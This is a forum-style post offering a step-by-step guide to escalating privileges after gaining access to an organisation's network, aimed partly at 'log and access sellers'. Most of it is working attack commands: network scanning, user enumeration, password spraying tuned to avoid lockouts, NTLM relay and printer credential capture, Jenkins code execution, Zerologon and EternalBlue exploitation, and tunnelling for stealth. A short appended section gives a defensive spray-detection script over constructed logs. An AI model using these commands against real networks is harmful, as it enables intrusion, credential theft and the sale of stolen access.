07-08-25, 05:50 AM
This article is a professional and comprehensive guide for hackers and penetration testers who have recently gained access to an organizational network via VPN or other methods and aim to escalate privileges or extract valuable information (e.g., high-privilege accounts or shells). Focusing on advanced techniques and modern methods, this guide helps you make the most of your initial access and avoid wasting penetration opportunities.
This guide targets two main audiences:
- Log and access sellers: To increase the value of their access by obtaining high-privilege accounts.
- Beginner and professional penetration testers: To learn or enhance techniques for penetrating organizational networks.
Article Structure
The guide is divided into four main sections:
1. Advanced Scanning & Enumeration
2. Targeted Password Spraying & Brute-Forcing
3. Web Services & Network Devices Exploitation
4. Exploiting Known Vulnerabilities
1. Advanced Scanning & Enumeration
Objective:
The first step after gaining network access is to thoroughly identify the network infrastructure, active devices, communication paths, and available services. This stage is foundational for all subsequent actions.
Recommended Tools:
- Nmap: For network scanning and identifying hosts and services.
- Masscan: For rapid scanning in large networks.
- Responder: For intercepting and extracting information from network protocols.
- CrackMapExec (CME): An advanced alternative to NetExec for interacting with SMB, Kerberos, and LDAP protocols.
Steps:
1. Identify Network Routes:
To map network routes, use the following commands:
In Windows:
Code:
route print
In Linux:
Code:
ip route show | grep -E 'via|default' | awk '{print $1, $3}'
- This command neatly displays the network routes related to the VPN or other interfaces.
2. Scan for Active Hosts:
To quickly scan for active hosts in an IP range:
Code:
sudo nmap -sn -n -T4 --min-rate 1000 10.10.0.0/16 -oG active_hosts.txt
- -sn: Ping scan only (no port scanning).
- -n: No DNS resolution for faster scanning.
- --min-rate 1000: Increases scanning speed.
- Output is saved to active_hosts.txt.
Extract the hosts reported as up into a target list:
Code:
grep "Up" active_hosts.txt | awk '{print $2}' > targets.txt
3. Scan Services and Versions:
After identifying active hosts, detect running services and their versions:
Code:
sudo nmap -sV -p- -T4 -iL targets.txt -oX services.xml
- -sV: Identify service versions.
- -p-: Scan all ports.
- -oX: Save output in XML format for further processing.
Domain controllers typically have ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) open. For quick identification:
Code:
nmap -p88,389,445 10.10.0.0/16 --open -oG dc_scan.txt
Or with CrackMapExec:
Code:
cme smb 10.10.0.0/16 --gen-relay-list dc_targets.txt

2. Targeted Password Spraying & Brute-Forcing
Objective:
Collect valid user accounts and test passwords to access more sensitive resources, such as local or domain admin accounts.
Recommended Tools:
- CrackMapExec (CME): For password spraying and extracting information from SMB and Kerberos.
- Kerbrute: For brute-forcing and identifying Kerberos accounts.
- Enum4linux-ng: An improved version of Enum4linux for extracting SMB information.
Steps:
1. Username Enumeration:
- Use Null Session to extract users without credentials:
Code:
cme smb 10.10.0.10 -u "" -p "" --users > users.txt
Or with an Nmap script:
Code:
nmap --script smb-enum-users -p445 10.10.0.10 -oN users_nmap.txt
2. RID Brute-Forcing:
If Null Session is disabled, use RID brute-forcing to extract users (the option takes a single maximum RID, not a range):
Code:
cme smb 10.10.0.10 -u "" -p "" --rid-brute 10000 > rid_users.txt
Or with Enum4linux-ng:
Code:
enum4linux-ng -R 10.10.0.10 -o users_enum.txt
3. Password Spraying:
Using a list of users and common passwords (e.g., Password123, Summer2025):
Code:
cme smb 10.10.0.0/24 -u users.txt -p passwords.txt --continue-on-success
- --continue-on-success: Continues testing even after a successful login.
Tip: Check password policies (Lockout Threshold) to avoid account lockouts:
Code:
cme smb 10.10.0.10 -u "" -p "" --pass-pol
4. Search AD Group Information:
Admins sometimes store passwords or sensitive information in user account descriptions:
Code:
cme smb 10.10.0.10 -u "" -p "" --users | grep -i "password\|admin"

3. Web Services & Network Devices Exploitation
Objective:
Leverage web services, printers, and network devices (e.g., routers, IoT) to extract sensitive information or gain higher access.
Recommended Tools:
- Burp Suite: For analyzing web traffic.
- Metasploit: For exploiting web and network vulnerabilities.
- Nmap Scripts: For scanning specific devices.
Steps:
1. Printer Exploitation: Printers often have web interfaces with default credentials (e.g., admin:admin). Steps:
- Access the printer's web interface (usually port 80 or 443).
- Check "Address Book" or "Network Settings" for user information.
- Use tools like Responder to capture SMB or LDAP credentials:
Code:
sudo responder -I eth0
In printer settings, set your IP as the LDAP server and capture port 389 traffic:
Code:
sudo tcpdump -i eth0 port 389 -w ldap_creds.pcap
2. Web Services Testing:
Many organizations use web services like Jenkins, Apache Tomcat, or SharePoint. To identify them:
Code:
nmap --script http-enum -p80,443 10.10.0.0/16 -oN web_services.txt
If Jenkins is found, use ready-made scripts for code execution:
Code:
curl -X POST -H "Jenkins-Crumb: <crumb>" "http://10.10.0.10:8080/script" --data 'script=<your_payload>'
3. Network Devices:
- Search for default credentials or known vulnerabilities in databases like Exploit-DB.
Code:
routersploit

4. Exploiting Known Vulnerabilities
Objective:
Use known vulnerabilities in network services and software to gain full access or shells.
Recommended Tools:
- Metasploit: For running pre-built exploits.
- Exploit-DB / Sploitus: For searching new exploits.
- Vulners / Shodan: For identifying vulnerable versions.
Common Vulnerabilities:
1. Zerologon (CVE-2020-1472): Resets domain controller passwords.
Code:
cme smb 10.10.0.10 --zerologon
2. MS17-010 (EternalBlue): Remote code execution on Windows systems.
Code:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.0.10; run"
3. SMBGhost (CVE-2020-0796): Exploits SMBv3.
4. BlueKeep (CVE-2019-0708): Targets older RDP systems.
Exploit Search:
To find exploits for identified services and versions:
Use Google with the format:
Code:
<service> <version> exploit site:exploit-db.com
Or use databases like:
- Sploitus
- Vulners
- Exploit-DB
Advanced Tips and Recommendations
1. Avoid Account Lockouts:
- Check Account Lockout Policies before password spraying.
- Use CME to test policies:
Code:
cme smb 10.10.0.10 --pass-pol
2. Relay Attacks:
- Use Responder to capture NTLM hashes:
Code:
sudo responder -I eth0 --wpad
Code:
ntlmrelayx.py -tf targets.txt -smb2support
3. Stealth:
- Avoid high-speed scans (e.g., Masscan) in sensitive networks.
- Use proxies or SSH tunnels to hide your traffic:
Code:
ssh -D 9050 user@your_server
4. Storage and Documentation:
- Save all outputs in organized files.
- Use project management tools like CherryTree or Dradis for documentation.
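An added detection-side example for the password-spraying step in section 2 and the lockout tip above (this is not code from the original post): it runs over constructed Windows-style logon records and counts distinct accounts per source, because a spray kept under the Lockout Threshold never produces a lockout event to alert on. The log format, event IDs as used here, IP addresses and usernames are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data): <timestamp> <event_id> <source_ip> <user>
# 4625 = failed logon, 4624 = successful logon (Windows Security log event IDs).
SAMPLE_LOG = """\
2025-07-08T05:50:01 4625 10.10.0.55 alice
2025-07-08T05:50:03 4625 10.10.0.55 bob
2025-07-08T05:50:05 4625 10.10.0.55 carol
2025-07-08T05:50:07 4625 10.10.0.55 dave
2025-07-08T05:50:09 4625 10.10.0.55 erin
2025-07-08T05:50:11 4624 10.10.0.55 frank
2025-07-08T05:51:00 4625 10.10.0.23 alice
2025-07-08T05:51:30 4625 10.10.0.23 alice
2025-07-08T05:52:00 4625 10.10.0.23 alice
"""

def parse_log(text):
    """Parse the constructed format into sorted (time, event_id, source, user) tuples."""
    events = []
    for line in text.splitlines():
        ts, event_id, src, user = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), src, user))
    return sorted(events)

def detect_spray(events, window=timedelta(minutes=30), min_users=5, lockout_threshold=5):
    """Flag sources that failed against >= min_users distinct accounts within one window;
    counting accounts per source (not failures per account) catches a spray kept under the threshold."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[2]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if e[1] == 4625]
        for i, first in enumerate(fails):
            per_user = defaultdict(int)
            for ev in fails[i:]:
                if ev[0] - first[0] > window:
                    break
                per_user[ev[3]] += 1
            if len(per_user) >= min_users:
                worst = max(per_user.values())
                findings[src] = {
                    "users": len(per_user),
                    "max_per_user": worst,
                    "under_lockout_threshold": worst < lockout_threshold,
                    "success_after": any(e[1] == 4624 and e[0] >= first[0] for e in evs),
                }
                break
    return findings
```

The second source (10.10.0.23) hammers one account and is left to ordinary lockout alerting; the first is reported as a spray with a success from the same source after the burst.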